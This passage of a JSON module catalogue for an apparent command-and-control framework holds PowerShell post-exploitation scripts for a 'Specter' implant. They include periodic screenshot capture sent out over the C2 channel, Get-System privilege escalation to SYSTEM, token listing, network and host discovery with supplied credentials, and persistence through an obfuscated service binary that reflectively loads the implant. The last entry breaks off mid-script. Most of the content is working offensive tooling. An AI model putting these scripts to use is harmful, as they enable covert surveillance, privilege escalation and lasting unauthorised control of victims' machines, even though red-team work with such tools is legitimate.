    "documentation": "# Overview\r\n\r\nThis script periodically takes screenshots as defined by the $interval variable for a duration specified by the $duration variable. By default, this script will collect 12 screenshots over period of 60 seconds and then exfiltrate the screenshots over the C2 channel in one single submission.\r\n\r\n# Example Output\r\n\r\n```\r\nFilename                             Size\r\n--------                             ----\r\nscreenshot-2023-01-09-23-30-57.jpg 103522\r\nscreenshot-2023-01-09-23-31-02.jpg  99447\r\nscreenshot-2023-01-09-23-31-08.jpg  91635\r\nscreenshot-2023-01-09-23-31-13.jpg  91652\r\nscreenshot-2023-01-09-23-31-18.jpg  91652\r\nscreenshot-2023-01-09-23-31-24.jpg  91658\r\nscreenshot-2023-01-09-23-31-29.jpg  91652\r\nscreenshot-2023-01-09-23-31-34.jpg  91652\r\nscreenshot-2023-01-09-23-31-39.jpg  91652\r\nscreenshot-2023-01-09-23-31-44.jpg  91658\r\nscreenshot-2023-01-09-23-31-50.jpg  91658\r\nscreenshot-2023-01-09-23-31-55.jpg  91652\r\n```\r\n\r\n```json\r\n[\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-30-57.jpg\",\r\n    \"Size\": 103522\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-02.jpg\",\r\n    \"Size\": 99447\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-08.jpg\",\r\n    \"Size\": 91635\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-13.jpg\",\r\n    \"Size\": 91652\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-18.jpg\",\r\n    \"Size\": 91652\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-24.jpg\",\r\n    \"Size\": 91658\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-29.jpg\",\r\n    \"Size\": 91652\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-34.jpg\",\r\n    \"Size\": 91652\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-39.jpg\",\r\n    \"Size\": 91652\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-44.jpg\",\r\n    \"Size\": 91658\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-50.jpg\",\r\n    \"Size\": 91658\r\n  },\r\n  {\r\n    \"Filename\": \"screenshot-2023-01-09-23-31-55.jpg\",\r\n    \"Size\": 91652\r\n  }\r\n]\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $True, HelpMessage = \"The amount of time to collect screenshots in dd:hh:mm:ss or hh:mm:ss format.\")]\r\n    [TimeSpan]$Duration = '00:05:00',\r\n\r\n    [Parameter(Mandatory = $True, HelpMessage = \"The interval to collect screenshots throughout the duration of this script in dd:hh:mm:ss or hh:mm:ss format.\")]\r\n    [TimeSpan]$Interval = '00:00:15',\r\n\r\n    [Parameter(Mandatory = $True, HelpMessage = 'If $True, the script will stream all of the screenshots back after the duration timer expires.')]\r\n    [bool]$DelayToEnd = $True\r\n)\r\n\r\n$Duration = [TimeSpan]$Duration;\r\n$Interval = [TimeSpan]$Interval;\r\n\r\nload recon;\r\n\r\n#Necessary variables\r\n$screenshots = New-Object System.Collections.ArrayList;\r\n$watch = New-Object System.Diagnostics.Stopwatch;\r\n$watch.Start();\r\n\r\n#Enter loop\r\nwhile($watch.ElapsedMilliseconds -lt $Duration.TotalMilliseconds) {\r\n    #Sleep until the next exfil time\r\n    Start-Sleep -Milliseconds $Interval.TotalMilliseconds;\r\n\r\n    #Collect screenshot compressed to 25%\r\n    $screenshot = screenshot -CompressionLevel 25;\r\n\r\n    #Add to list\r\n    if($DelayToEnd) {\r\n        [void]$screenshots.Add($screenshot);\r\n    } else {\r\n        $screenshots | exfil;\r\n    }\r\n}\r\n\r\n#Exfil\r\nif($DelayToEnd) {\r\n    $screenshots | exfil;\r\n}",
    "version": 5,
    "isPremium": true,
    "labels": [
      "collection",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "9f31a8d9b1c34641bf2318847d7957c3",
    "name": "Get Netsh Port Proxy via Commandline",
    "description": "Lists all netsh interface portproxies functioning as TCP redirectors.",
    "documentation": "# Overview\r\n\r\nLists current TCP redirectors using netsh commands.\r\n\r\n# Dependencies\r\n\r\n* None\r\n\r\n# Example Text Output\r\n\r\nExample output with a portproxy configured.\r\n\r\n```\r\nListen on ipv4:             Connect to ipv4:\r\n\r\nAddress         Port        Address         Port\r\n--------------- ----------  --------------- ----------\r\n0.0.0.0         45327       192.168.1.103   3389\r\n```",
    "scriptBlock": "netsh interface portproxy show all",
    "version": 5,
    "isPremium": true,
    "labels": [
      "command-line",
      "internal-proxy",
      "lateral-movement",
      "proxy",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "81ab9f8ccc16461ab9641d1fe23f0051",
    "name": "Get System",
    "description": "The Get-System cmdlet attempts to acquire NT AUTHORITY\\SYSTEM privileges through one of several techniques. ",
    "documentation": "# Overview\r\n\r\nThe Get-System cmdlet attempts to acquire NT AUTHORITY\\SYSTEM privileges through one of several techniques. These techniques require Administrator privilges. It looks through existing tokens stored in TokenManager for a \"SYSTEM\" token, if one is not found, it searches through existing processes and returns a match if avaliable.\r\n\r\n# Dependencies\r\n\r\n- credentials\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- High Integrity process.\r\n\r\n# Example Text\r\n\r\n```\r\nName            : SYSTEM\r\nDomain          : NT AUTHORITY\r\nSID             : S-1-5-18\r\nGroups          : {BUILTIN\\Administrators, Everyone, NT AUTHORITY\\Authenticated Users}\r\nScope           : Local\r\nType            : TokenPrimary\r\nPrivileges      : {@{Name=SeAssignPrimaryTokenPrivilege; Attributes=None}, @{Name=SeLockMemoryPrivilege; Attributes=UsedForAccess}, @{Name=SeIncreaseQuotaPrivilege; Attributes=None}, @{Name=SeTcbPrivilege; Attributes=UsedForAccess}…}\r\nIsAdministrator : True\r\n```\r\n\r\n# Example Json\r\n\r\n```json\r\n{\r\n  \"Name\": \"SYSTEM\",\r\n  \"Domain\": \"NT AUTHORITY\",\r\n  \"SID\": \"S-1-5-18\",\r\n  \"Groups\": [\r\n    \"BUILTIN\\\\Administrators\",\r\n    \"Everyone\",\r\n    \"NT AUTHORITY\\\\Authenticated Users\"\r\n  ],\r\n  \"Scope\": \"Local\",\r\n  \"Type\": \"TokenPrimary\",\r\n  \"Privileges\": [\r\n    {\r\n      \"Name\": \"SeAssignPrimaryTokenPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeLockMemoryPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeIncreaseQuotaPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeTcbPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeSecurityPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeTakeOwnershipPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeLoadDriverPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeSystemProfilePrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeSystemtimePrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeProfileSingleProcessPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeIncreaseBasePriorityPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeCreatePagefilePrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeCreatePermanentPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeBackupPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeRestorePrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeShutdownPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeDebugPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeAuditPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeSystemEnvironmentPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeChangeNotifyPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeUndockPrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeManageVolumePrivilege\",\r\n      \"Attributes\": \"None\"\r\n    },\r\n    {\r\n      \"Name\": \"SeImpersonatePrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeCreateGlobalPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeIncreaseWorkingSetPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeTimeZonePrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeCreateSymbolicLinkPrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    },\r\n    {\r\n      \"Name\": \"SeDelegateSessionUserImpersonatePrivilege\",\r\n      \"Attributes\": \"UsedForAccess\"\r\n    }\r\n  ],\r\n  \"IsAdministrator\": true\r\n}\r\n```",
    "scriptBlock": "load credentials;\r\n\r\nGet-System",
    "version": 1,
    "isPremium": true,
    "labels": [
      "privilege-escalation",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "af3dbee598674160b79586f766dcdcdc",
    "name": "Get Connected Networks via API",
    "description": "Retrieves the IPv4 address and network assigned to each interface on the current system.",
    "documentation": "# Overview\r\n\r\nRetrieves the IPv4 address and network assigned to each interface on the current system.\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nInterfaceName        : Ethernet1\r\nInterfaceType        : Ethernet\r\nInterfaceDescription : Intel(R) 82574L Gigabit Network Connection #2\r\nNetwork              : 192.168.1.0/24\r\nIP                   : 192.168.1.101\r\nInterfaceIndex       : 5\r\n\r\nInterfaceName        : Ethernet0\r\nInterfaceType        : Ethernet\r\nInterfaceDescription : Intel(R) 82574L Gigabit Network Connection\r\nNetwork              : 10.0.0.0/24\r\nIP                   : 10.0.0.15\r\nInterfaceIndex       : 10\r\n```",
    "scriptBlock": "load recon;\r\n\r\n$interfaces = Get-Interfaces\r\n\r\n$multicast = [common.Networking.IPNetwork]::Parse('224.0.0.0/4');\r\n\r\nforeach($interface in $interfaces) {\r\n\t#Network must be Up to scan\r\n\tif($interface.Status -ne 'Up') {\r\n\t\tcontinue;\r\n\t}\r\n\t\r\n\tif($interface.InterfaceType -eq 'Loopback') {\r\n\t\tcontinue;\r\n\t}\r\n\t\r\n\tforeach($entry in $interface.InterfaceIPs) {\r\n\t\t$address = [System.Net.IPAddress]::Parse($entry.IP);\r\n\t\tif($address.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetworkV6 -or [common.Networking.IPNetwork]::Contains($multicast, $address) -or $address -eq [System.Net.IPAddress]::Broadcast) {\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\t\r\n\t\t$network = $null;\r\n\t\tif(![common.Networking.IPNetwork]::TryParse($entry.IP, $entry.Netmask, [ref]$network)) {\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\t\r\n\t\tNew-Object PSObject -Property @{\r\n\t\t\t\"IP\" = $entry.IP;\r\n\t\t\t\"Network\" = $network.ToString();\r\n\t\t\t\"InterfaceIndex\" = $interface.InterfaceIndex;\r\n\t\t\t\"InterfaceName\" = $interface.InterfaceName;\r\n\t\t\t\"InterfaceType\" = $interface.InterfaceType;\r\n\t\t\t\"InterfaceDescription\" = $interface.InterfaceDescription\r\n\t\t}\r\n\t}\r\n}",
    "version": 1,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "network-discovery",
      "passive",
      "system-network-configuration-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "2ed30808f4914e0da43af2390174b2b1",
    "name": "Get Tokens",
    "description": "Gets all of the tokens stored in the TokenManager.",
    "documentation": "# Overview\r\n\r\nThis script will return all of the token objects stored in the TokenManager. By default, there is only one token for the current user context, but additional tokens may be added through commands such as Get-System.\r\n\r\n# Dependencies\r\n\r\n- credentials\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Text\r\n\r\n```\r\nName            : helpdesk\r\nDomain          : DESKTOP-LMCH70V\r\nSID             : S-1-5-21-3175321519-4186628844-3469316858-1001\r\nGroups          : {BUILTIN\\Administrators, BUILTIN\\Performance Log Users, BUILTIN\\Users, CONSOLE LOGON…}\r\nScope           : Local\r\nType            : TokenPrimary\r\nPrivileges      : {@{Name=SeIncreaseQuotaPrivilege; Attributes=None}, @{Name=SeSecurityPrivilege; Attributes=None}, @{Name=SeTakeOwnershipPrivilege; Attributes=None}, @{Name=SeLoadDriverPrivilege; Attributes=None}…}\r\nIsAdministrator : True\r\n\r\nName            : SYSTEM\r\nDomain          : NT AUTHORITY\r\nSID             : S-1-5-18\r\nGroups          : {BUILTIN\\Administrators, Everyone, NT AUTHORITY\\Authenticated Users}\r\nScope           : Local\r\nType            : TokenPrimary\r\nPrivileges      : {@{Name=SeAssignPrimaryTokenPrivilege; Attributes=None}, @{Name=SeLockMemoryPrivilege; Attributes=UsedForAccess}, @{Name=SeIncreaseQuotaPrivilege; Attributes=None}, @{Name=SeTcbPrivilege; Attributes=UsedForAccess}…}\r\nIsAdministrator : True\r\n```\r\n\r\n# Example Json\r\n\r\n```json\r\n[\r\n  {\r\n    \"Name\": \"helpdesk\",\r\n    \"Domain\": \"DESKTOP-LMCH70V\",\r\n    \"SID\": \"S-1-5-21-3175321519-4186628844-3469316858-1001\",\r\n    \"Groups\": [\r\n      \"BUILTIN\\\\Administrators\",\r\n      \"BUILTIN\\\\Performance Log Users\",\r\n      \"BUILTIN\\\\Users\",\r\n      \"CONSOLE LOGON\",\r\n      \"DESKTOP-LMCH70V\\\\None\",\r\n      \"Everyone\",\r\n      \"LOCAL\",\r\n      \"NT AUTHORITY\\\\Authenticated Users\",\r\n      \"NT AUTHORITY\\\\INTERACTIVE\",\r\n      \"NT AUTHORITY\\\\Local account\",\r\n      \"NT AUTHORITY\\\\Local account and member of Administrators group\",\r\n      \"NT AUTHORITY\\\\NTLM Authentication\",\r\n      \"NT AUTHORITY\\\\This Organization\"\r\n    ],\r\n    \"Scope\": \"Local\",\r\n    \"Type\": \"TokenPrimary\",\r\n    \"Privileges\": [\r\n      {\r\n        \"Name\": \"SeIncreaseQuotaPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSecurityPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeTakeOwnershipPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeLoadDriverPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSystemProfilePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSystemtimePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeProfileSingleProcessPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeIncreaseBasePriorityPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeCreatePagefilePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeBackupPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeRestorePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeShutdownPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeDebugPrivilege\",\r\n        \"Attributes\": \"Enabled\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSystemEnvironmentPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeChangeNotifyPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeRemoteShutdownPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeUndockPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeManageVolumePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeImpersonatePrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeCreateGlobalPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeIncreaseWorkingSetPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeTimeZonePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeCreateSymbolicLinkPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeDelegateSessionUserImpersonatePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      }\r\n    ],\r\n    \"IsAdministrator\": true\r\n  },\r\n  {\r\n    \"Name\": \"SYSTEM\",\r\n    \"Domain\": \"NT AUTHORITY\",\r\n    \"SID\": \"S-1-5-18\",\r\n    \"Groups\": [\r\n      \"BUILTIN\\\\Administrators\",\r\n      \"Everyone\",\r\n      \"NT AUTHORITY\\\\Authenticated Users\"\r\n    ],\r\n    \"Scope\": \"Local\",\r\n    \"Type\": \"TokenPrimary\",\r\n    \"Privileges\": [\r\n      {\r\n        \"Name\": \"SeAssignPrimaryTokenPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeLockMemoryPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeIncreaseQuotaPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeTcbPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSecurityPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeTakeOwnershipPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeLoadDriverPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSystemProfilePrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSystemtimePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeProfileSingleProcessPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeIncreaseBasePriorityPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeCreatePagefilePrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeCreatePermanentPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeBackupPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeRestorePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeShutdownPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeDebugPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeAuditPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeSystemEnvironmentPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeChangeNotifyPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeUndockPrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeManageVolumePrivilege\",\r\n        \"Attributes\": \"None\"\r\n      },\r\n      {\r\n        \"Name\": \"SeImpersonatePrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeCreateGlobalPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeIncreaseWorkingSetPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeTimeZonePrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeCreateSymbolicLinkPrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      },\r\n      {\r\n        \"Name\": \"SeDelegateSessionUserImpersonatePrivilege\",\r\n        \"Attributes\": \"UsedForAccess\"\r\n      }\r\n    ],\r\n    \"IsAdministrator\": true\r\n  }\r\n]\r\n```",
    "scriptBlock": "load credentials;\r\n\r\nGet-Token",
    "version": 1,
    "isPremium": true,
    "labels": [
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "7e881c0602f34056acf62c36676ceb22",
    "name": "Get System Info via Commandline",
    "description": "Lists system information about the local or remote system.",
    "documentation": "# Overview\r\n\r\nRuns the systeminfo command to retrieve properties of the local or remote system.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites:\r\n\r\n- Authenticated user for remote access.\r\n\r\n# Example Output\r\n\r\n```\r\nHost Name:                 DESKTOP-LMCH70V\r\nOS Name:                   Microsoft Windows 10 Pro\r\nOS Version:                10.0.19045 N/A Build 19045\r\nOS Manufacturer:           Microsoft Corporation\r\nOS Configuration:          Standalone Workstation\r\nOS Build Type:             Multiprocessor Free\r\nRegistered Owner:          helpdesk\r\nRegistered Organization:\r\nProduct ID:                00330-80000-00000-AA108\r\nOriginal Install Date:     12/30/2021, 10:57:26 PM\r\nSystem Boot Time:          1/23/2024, 6:26:59 PM\r\nSystem Manufacturer:       VMware, Inc.\r\nSystem Model:              VMware7,1\r\nSystem Type:               x64-based PC\r\nProcessor(s):              1 Processor(s) Installed.\r\n                           [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~2712 Mhz\r\nBIOS Version:              VMware, Inc. VMW71.00V.18452719.B64.2108091906, 8/9/2021\r\nWindows Directory:         C:\\Windows\r\nSystem Directory:          C:\\Windows\\system32\r\nBoot Device:               \\Device\\HarddiskVolume1\r\nSystem Locale:             en-us;English (United States)\r\nInput Locale:              en-us;English (United States)\r\nTime Zone:                 (UTC-08:00) Pacific Time (US & Canada)\r\nTotal Physical Memory:     8,191 MB\r\nAvailable Physical Memory: 1,648 MB\r\nVirtual Memory: Max Size:  25,254 MB\r\nVirtual Memory: Available: 9,971 MB\r\nVirtual Memory: In Use:    15,283 MB\r\nPage File Location(s):     C:\\pagefile.sys\r\nDomain:                    WORKGROUP\r\nLogon Server:              \\\\DESKTOP-LMCH70V\r\nHotfix(s):                 15 Hotfix(s) Installed.\r\n                           [01]: KB5033918\r\n                           [02]: KB5028951\r\n                           [03]: KB5003791\r\n                           [04]: KB5011048\r\n                           [05]: KB5015684\r\n                           [06]: KB5034122\r\n                           [07]: KB5007273\r\n                           [08]: KB5026879\r\n                           [09]: KB5028318\r\n                           [10]: KB5028380\r\n                           [11]: KB5029709\r\n                           [12]: KB5031539\r\n                           [13]: KB5032392\r\n                           [14]: KB5032907\r\n                           [15]: KB5005699\r\nNetwork Card(s):           2 NIC(s) Installed.\r\n                           [01]: Intel(R) 82574L Gigabit Network Connection\r\n                                 Connection Name: Ethernet0\r\n                                 DHCP Enabled:    Yes\r\n                                 DHCP Server:     192.168.132.254\r\n                                 IP address(es)\r\n                                 [01]: 192.168.132.135\r\n                                 [02]: fe80::e291:3de2:b903:b8ac\r\n                           [02]: Intel(R) 82574L Gigabit Network Connection\r\n                                 Connection Name: Ethernet1\r\n                                 DHCP Enabled:    Yes\r\n                                 DHCP Server:     192.168.1.2\r\n                                 IP address(es)\r\n                                 [01]: 192.168.1.101\r\n                                 [02]: fe80::2150:2b0b:6e7e:8082\r\nHyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(ParameterSetName=\"Impersonate\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The IP address or hostname of the system to run the cradle.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Target = \"localhost\",\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The local or domain username to authenticate with.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Username,\r\n\r\n    [Parameter(ParameterSetName=\"Username and Password\", Mandatory=$True, HelpMessage=\"The password for the specified user.\")]\r\n    [ValidateNotNullOrEmpty]\r\n    [string]$Password\r\n)\r\n\r\nif(![String]::IsNullOrEmpty($Username) -and $Password -ne $null) {\r\n    systeminfo /S $Target /U $Username /P $Password;\r\n} else {\r\n    systeminfo /S $Target;\r\n}",
    "version": 1,
    "isPremium": true,
    "labels": [
      "command-line",
      "discovery",
      "host-discovery",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "e8606fe5f72f4268a380161b3fbc59c0",
    "name": "Persistence Using Service Control Manager and Obfuscated Service Binary",
    "description": "This script establishes persistence by installing a obfuscated .NET service binary that reflectively loads a Specter implant.",
    "documentation": "# Overview\r\n\r\nThis script generates an obfuscated .NET service binary, saves it to disk, and then leverages the Service Control Manager API to create and run a service on the localhost that starts the service binary. The service will be run under the NT AUTHORITY\\SYSTEM account.\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Dependencies\r\n\r\n- common\r\n- lateral\r\n\r\n# Pre-Requisites\r\n\r\n- Administrator rights\r\n- High integrity process",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build,\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The folder where the service directory will be created.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$Directory = \"C:\\Program Files\\\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The type of payload to drop.\")]\r\n    [ValidateSet(\"csharp_service_load_module\", \"csharp_service_powershell_host\")]\r\n    [string]$Payload = \"csharp_service_load_module\",\r\n\r\n    [Parameter(Mandatory = $false, HelpMessage = \"Determines whether or not to start the persistence method immediately.\")]\r\n    [bool]$StartImmediately = $false\r\n)\r\n\r\nload common;\r\nload lateral;\r\n\r\n#Generate a new PowerShell cradle command\r\n$contents = payload -Build $Build -Kind $Payload;\r\n$config = payload -Build $Build -Kind 'csharp_config';\r\n\r\n#Get the filename of the payload\r\n$assembly = [System.Reflection.Assembly]::Load($contents);\r\n$filename = $assembly.GetName();\r\n$serviceName = $filename.Name + \"Svc\";\r\n\r\n#Define the paths\r\n$localRootPath = [System.IO.Path]::Combine($Directory, $filename.Name);\r\n$localBinaryPath = [System.IO.Path]::Combine($localRootPath, $filename.Name + \".exe\");\r\n\r\n#Copy the payload to the remote system\r\ntry {\r\n    [void][System.IO.Directory]::CreateDirectory($localRootPath);\r\n    [System.IO.File]::WriteAllBytes($localBinaryPath, $contents);\r\n    [System.IO.File]::WriteAllText($localBinaryPath + \".config\", $config);\r\n\r\n    #Create the service\r\n    $nostart = !$StartImmediately;\r\n    Create-Service -ComputerName \"localhost\" -ServiceName $serviceName -Path $localBinaryPath -NoStart:$nostart;\r\n    $success = $true;\r\n} catch {\r\n    $success = $false;\r\n    throw;\r\n}\r\n\r\nNew-Object psobject -Property @{\r\n    Persistence = New-Object psobject -Property @{\r\n        Method = \"System Sevice\";\r\n        Profile = \"System\";\r\n        Trigger = \"OnStart\";\r\n        Event = \"Create\";\r\n        Build = $Build;\r\n        Payload = $Payload;\r\n        Path = $localBinaryPath;\r\n        Success = $success;\r\n        UninstallScript = @\"\r\ntry {\r\n    Remove-Service -Name '$serviceName';\r\n    [System.IO.Directory]::Delete('$localRootPath');\r\n    `$success = `$true;\r\n} catch {\r\n    `$success = `$false;\r\n}\r\n\r\nNew-Object psobject -Property @{\r\n    Persistence = New-Object psobject -Property 